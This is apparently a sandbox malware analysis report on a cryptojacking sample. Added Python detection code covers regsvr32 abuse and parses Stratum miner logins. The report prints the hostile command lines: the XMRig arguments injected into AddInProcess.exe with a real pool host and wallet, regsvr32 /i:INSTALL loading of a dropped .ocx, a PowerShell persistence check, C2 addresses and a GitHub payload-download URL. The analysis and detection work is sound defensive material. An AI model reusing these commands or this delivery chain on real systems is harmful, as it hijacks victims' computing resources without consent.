
Windows Analysis Report
SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe
Analysis ID: 1611947
MD5: f3b99592f40e424a2fb51e8f60b98077
SHA1: 16481ab398ad77608131d6ef9dbccce2965a970f
SHA256: aa63cf25cfc47e6a53dc1b286e425faa8775ac0311c47ca6c59d1950cfa03251
Tags: exe, user-SecuriteInfoCom

Detection

Xmrig
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe (PID: 4184 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe" MD5: F3B99592F40E424A2FB51E8F60B98077)
    • cmd.exe (PID: 6860 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 5840 cmdline: ping -n 5 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • Stamp_Setup.exe (PID: 5856 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: EDD03FA3225E40CA97884CF91EC1DF79)
        • Stamp_Setup.tmp (PID: 1060 cmdline: "C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp" /SL5="$A0052,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: 639207875E87BFD011BFF971435A47DE)
          • Stamp_Setup.exe (PID: 6400 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: EDD03FA3225E40CA97884CF91EC1DF79)
            • Stamp_Setup.tmp (PID: 7016 cmdline: "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: 639207875E87BFD011BFF971435A47DE)
              • regsvr32.exe (PID: 6992 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
                • regsvr32.exe (PID: 1112 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                  • powershell.exe (PID: 5892 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6480 cmdline: "PowerShell.exe" -NoProfile -NonInteractive -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5708 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • AddInProcess.exe (PID: 6860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
                  • AddInProcess.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
                  • AddInProcess.exe (PID: 1060 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
  • regsvr32.exe (PID: 4932 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 3700 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
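The process tree above shows the delivery chain: an Inno Setup installer (Stamp_Setup.exe) drops a .ocx into %APPDATA%, regsvr32.exe loads it with /s /i:INSTALL, the regsvr32 process spawns powershell.exe to check for its scheduled-task persistence, and the miner runs inside the signed .NET Framework binary AddInProcess.exe with XMRig pool arguments. The following Python is an added example, not part of the Joe Sandbox report or of the sample, that encodes those three relationships as checks over process-creation events. The event records are constructed from the command lines in the tree, and the field names (image, cmdline, parent_image) are an assumed minimal schema rather than any specific log format.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed schema, not a specific log format)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


# Paths a standard user can write to; a COM server or scriptlet registered from here is suspect.
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Users\\[^\\]+\\Desktop)\\", re.I)
# regsvr32 /i[:cmdline] calls the module's DllInstall export, the LOLBin path used here.
REGSVR_INSTALL = re.compile(r"(?:^|\s)/i[:\s]", re.I)
# XMRig-style arguments: -o/--url pool:port and -u/--user wallet[.worker].
POOL_ARG = re.compile(r"(?:^|\s)(?:-o|--url)[\s=]+[\w.\-]+:\d+", re.I)
USER_ARG = re.compile(r"(?:^|\s)(?:-u|--user)[\s=]+\S+", re.I)
# Signed .NET Framework binaries that are commonly used as a host process for injected miners.
DOTNET_HOSTS = {"addinprocess.exe", "addinprocess32.exe", "regasm.exe",
                "regsvcs.exe", "aspnet_compiler.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list:
    """Return (tag, pid) findings for one event; empty list if nothing matches."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    hits = []
    if img == "regsvr32.exe" and REGSVR_INSTALL.search(ev.cmdline) and USER_WRITABLE.search(ev.cmdline):
        hits.append(("regsvr32_userpath_install", ev.pid))
    if parent == "regsvr32.exe" and img == "powershell.exe":
        hits.append(("powershell_from_regsvr32", ev.pid))
    if img in DOTNET_HOSTS and POOL_ARG.search(ev.cmdline) and USER_ARG.search(ev.cmdline):
        hits.append(("dotnet_host_miner_args", ev.pid))
    return hits


def scan(events) -> list:
    return [h for ev in events for h in check_event(ev)]


# Constructed events mirroring the report's tree (PIDs and command lines taken from it),
# plus one benign-looking regsvr32 registration from Program Files as a negative case.
PS_CHECK = ('"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq '
            "'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\\Users\\user\\AppData\\Roaming\\9mpr_8.ocx' }) "
            '{ exit 0 } else { exit 1 }"')
SAMPLE_EVENTS = [
    ProcEvent(6992, r"C:\Windows\SysWOW64\regsvr32.exe",
              r'"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"',
              r"C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp"),
    ProcEvent(5892, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              PS_CHECK, r"C:\Windows\System32\regsvr32.exe"),
    ProcEvent(6860, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 "
              r"-a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50",
              r"C:\Windows\System32\regsvr32.exe"),
    ProcEvent(1234, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"',
              r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for tag, pid in scan(SAMPLE_EVENTS):
        print(f"{tag}: pid {pid}")
```

The negative case matters: regsvr32 registering a control from Program Files under an installer is routine, so the first check keys on the /i install switch combined with a user-writable path rather than on regsvr32 alone. The third check is deliberately narrow (pool plus wallet argument on a .NET host binary) so that it does not fire on ordinary .NET tooling.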
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Process Memory Space: regsvr32.exe PID: 1112 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Process Memory Space: regsvr32.exe PID: 1112 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

          Bitcoin Miner

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50, ProcessId: 6860, ProcessName: AddInProcess.exe

          System Summary

Source: Process started | Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 5892, ProcessName: powershell.exe
Source: Network Connection | Author: Dmitriy Lifanov, oscd.community | Data: DestinationIp: 93.88.203.169, DestinationIsIpv6: false, DestinationPort: 39001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 1112, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 65255
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp, ParentProcessId: 7016, ParentProcessName: Stamp_Setup.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ProcessId: 6992, ProcessName: regsvr32.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 5892, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 5892, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-11T11:00:27.305756+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 93.88.203.169 | 56001 | 192.168.2.8 | 49706 | TCP
2025-02-11T11:00:05.792619+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.8 | 65271 | 161.35.34.195 | 3333 | TCP


          AV Detection

Source: C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Virustotal: Detection: 58%
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability

          Bitcoin Miner

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1112, type: MEMORYSTR
Source: global traffic | TCP traffic: 192.168.2.8:65269 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: global traffic | TCP traffic: 192.168.2.8:65270 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: global traffic | TCP traffic: 192.168.2.8:65271 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: regsvr32.exe, 0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.8:65257 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:65259 version: TLS 1.2
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb | source: Stamp_Setup.tmp, 0000000A.00000003.2215454921.0000000002192000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000003.2209826181.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000C.00000003.2236329531.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr
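The three TCP payloads above are XMRig's Stratum login: one newline-delimited JSON-RPC object sent to the pool in clear text over TCP (the stratum+tcp:// scheme found in regsvr32.exe memory), carrying the wallet and worker name, the miner's agent string and its algorithm list. Because the login is plaintext, it can be carved straight out of a capture. The following Python is an added example, not from the report, that parses such frames from raw payload bytes, splits the Unmineable-style COIN:ADDRESS.WORKER login, and flags miner agents and algorithm families. The capture records are constructed; the login text is the one shown in the report with its algorithm list shortened.

```python
import json
import re
from dataclasses import dataclass, field

# Login frame as reported for 192.168.2.8:65269 -> 161.35.34.195:3333
# (algo list shortened from the report's 28 entries; everything else as reported).
REPORTED_LOGIN = (
    '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":'
    '"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x",'
    '"agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019",'
    '"algo":["rx/0","cn/2","cn/r","rx/wow","argon2/chukwa","ghostrider"]}}\n'
)

# Constructed capture records (src, dst, payload). Only the first is a miner login;
# the second is a non-login Stratum frame, the third is not JSON at all.
SAMPLE_CAPTURE = [
    ("192.168.2.8:65269", "161.35.34.195:3333", REPORTED_LOGIN.encode()),
    ("192.168.2.8:65300", "161.35.34.195:3333",
     b'{"id":2,"jsonrpc":"2.0","method":"keepalived","params":{"id":"abc"}}\n'),
    ("192.168.2.8:65310", "203.0.113.10:80",
     b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"),
]

MINER_AGENTS = re.compile(r"\b(xmrig|xmr-stak|cpuminer|srbminer|lolminer)\b", re.I)
# RandomX, CryptoNight, Argon2 and GhostRider families as advertised by XMRig.
MINER_ALGO_PREFIXES = ("rx/", "cn/", "cn-", "argon2/", "ghostrider")


@dataclass
class StratumLogin:
    src: str
    dst: str
    agent: str
    coin: str
    wallet: str
    worker: str
    algos: list = field(default_factory=list)

    @property
    def is_miner(self) -> bool:
        by_agent = bool(MINER_AGENTS.search(self.agent))
        by_algo = any(a.startswith(MINER_ALGO_PREFIXES) for a in self.algos)
        return by_agent or by_algo


def parse_stratum_frames(payload: bytes) -> list:
    """Split a TCP payload into newline-delimited JSON-RPC objects.
    raw_decode() tolerates trailing junk after a frame; non-JSON lines are skipped."""
    dec = json.JSONDecoder()
    frames = []
    for raw in payload.split(b"\n"):
        text = raw.decode("utf-8", "replace").strip()
        if not text.startswith("{"):
            continue
        try:
            obj, _ = dec.raw_decode(text)
        except ValueError:
            continue
        if isinstance(obj, dict):
            frames.append(obj)
    return frames


def login_from_frame(src: str, dst: str, frame: dict):
    """Return a StratumLogin for a 'login' frame, else None."""
    if frame.get("method") != "login":
        return None
    params = frame.get("params") or {}
    login = str(params.get("login", ""))
    # Unmineable-style logins are COIN:ADDRESS.WORKER; plain pools use ADDRESS[.WORKER].
    coin, _, rest = login.partition(":") if ":" in login else ("", "", login)
    wallet, _, worker = rest.partition(".")
    return StratumLogin(src, dst, str(params.get("agent", "")), coin, wallet, worker,
                        [str(a) for a in params.get("algo", [])])


def analyse(capture) -> list:
    found = []
    for src, dst, payload in capture:
        for frame in parse_stratum_frames(payload):
            rec = login_from_frame(src, dst, frame)
            if rec:
                found.append(rec)
    return found


if __name__ == "__main__":
    for rec in analyse(SAMPLE_CAPTURE):
        verdict = "MINER" if rec.is_miner else "stratum login"
        print(f"{verdict}: {rec.src} -> {rec.dst} agent={rec.agent!r} "
              f"coin={rec.coin} wallet={rec.wallet} worker={rec.worker}")
```

The wallet and worker name are the most durable indicators here: the pool hostname and port can change per build, but the payout address ties every infected host to the same operator, and the worker suffix (RIG_CPU above) is often reused across a campaign. The agent string is useful but trivially editable, so the algorithm-family check is kept as a second signal.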

          Networking

Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.2.8:49706
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 140.82.121.4 443
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 93.88.203.169 39001
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 185.199.110.133 443
Source: global traffic | TCP traffic: 93.88.203.169 ports 39001,0,1,56001,5,6
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: global traffic | TCP traffic: 192.168.2.8:49706 -> 93.88.203.169:56001
Source: global traffic | TCP traffic: 192.168.2.8:65269 -> 161.35.34.195:3333
Source: global traffic | TCP traffic: 192.168.2.8:64985 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1 Host: github.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 140.82.121.4
